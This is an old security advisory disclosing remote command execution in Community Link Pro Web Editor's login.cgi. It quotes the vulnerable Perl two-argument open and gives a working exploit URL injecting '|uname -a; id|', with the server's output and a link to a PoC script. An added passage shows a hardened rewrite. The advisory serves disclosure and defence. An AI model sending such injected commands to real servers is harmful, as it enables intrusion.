[badroot security] Community link pro web editor: Remote command Execution
- - - - - - - - - - - - - - - - - - - - - - - - -
BADROOT SECURITY GROUP
Security Advisory 2005-#0x05
http://www.badroot.org
irc.us.azzurra.org ~ #badroot
- - - - - - - - - - - - - - - - - - - - - - - - -
Authors ....... spher3 (spher3 at fatalimpulse dot net)
mozako (admin at fatalimpulse dot net)
Date ............. 29-06-2005
Product ....... Community Link Pro Web Editor (login.cgi)
Type ............ Remote Command Execution
o Description:
============================
Login.cgi is a login script written in Perl, shipped with Community Link Pro Web Editor,
that allows a remote user to log in to his own personal page.
o Vulnerable Code:
============================
[...]
# Two-argument open: a filename that begins or ends with '|' is treated
# as a command to pipe from or to, and $FORM{'file'} is used unchecked.
open(FILE2,"$memberspath/$FORM{'username'}/$FORM{'file'}");
foreach (<FILE2>) {
print;
}
close(FILE2);
[...]
This code performs no validation of the CGI query, and in particular none of $FORM{'file'}.
Because the value is passed straight to a two-argument open, a remote user can run
system commands (Remote Command Execution vulnerability) with a request string
like login.cgi?username=&command=simple&do=edit&password=&file=|COMMAND|.
Example:
http://www.hostvuln.net/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|uname -a; id|
Linux host.vuln.net 2.6.10-3mdk #1 Tue Feb 22 01:32:42 CET 2005 i686 unknown unknown GNU/Linux
uid=72(apache) gid=72(apache) groups=72(apache)
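The flaw above comes from Perl's two-argument open with an unvalidated parameter. As an added example (not the vendor's code, and not from the advisory), here is that pattern beside a hardened version; $memberspath and the parsed %FORM values are assumed to come from the script's configuration and query parsing as in the original.

```perl
#!/usr/bin/perl
# Added example, not the Community Link Pro code: vulnerable open vs. hardened open.
use strict;
use warnings;

# Vulnerable form, as in the advisory: with two-argument open, a value that
# begins or ends with '|' is treated as a command to pipe from or to, so the
# 'file' parameter is executed as a shell command instead of opened as a file.
sub show_file_vulnerable {
    my ($memberspath, $form) = @_;
    open(FILE2, "$memberspath/$form->{username}/$form->{file}");
    foreach (<FILE2>) { print; }
    close(FILE2);
}

# Hardened form: validate both user-supplied components against a strict
# allow-list, refuse traversal, and use three-argument open with an explicit
# read mode so the value can only ever be treated as a filename.
sub show_file_hardened {
    my ($memberspath, $form) = @_;
    my ($user, $file) = @{$form}{qw(username file)};

    # Plain identifiers only: no '|', '/', NUL or shell metacharacters.
    return "bad username" unless defined $user && $user =~ /\A[A-Za-z0-9_-]{1,32}\z/;
    return "bad file"     unless defined $file && $file =~ /\A[A-Za-z0-9_.-]{1,64}\z/;
    return "bad file"     if $file =~ /\A\.+\z/;   # reject "." and ".."

    my $path = "$memberspath/$user/$file";
    return "not a file" unless -f $path;
    open(my $fh, '<', $path) or return "cannot open";   # '<' mode: never a pipe
    print while <$fh>;
    close($fh);
    return "ok";
}

# Constructed inputs: the pipe-wrapped value the advisory describes is
# rejected before any open is attempted; a plain filename passes validation.
if (!caller) {
    my %bad  = (username => '',      file => '|id|');
    my %good = (username => 'alice', file => 'index.html');
    print show_file_hardened('/var/www/members', \%bad),  "\n";   # bad username
    print show_file_hardened('/var/www/members', \%good), "\n";   # ok or not a file
}
```

Running the CGI under taint mode (perl -T) would also have stopped the piped open, since Perl refuses to start a subprocess from tainted data; it does not, however, replace the path validation shown here.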
o Proof of concept:
============================
You can download a simple PoC Exploit from:
http://www.badroot.org/exploits/clogin.pl
Original ADV:
http://www.badroot.org/advisories/SA0x05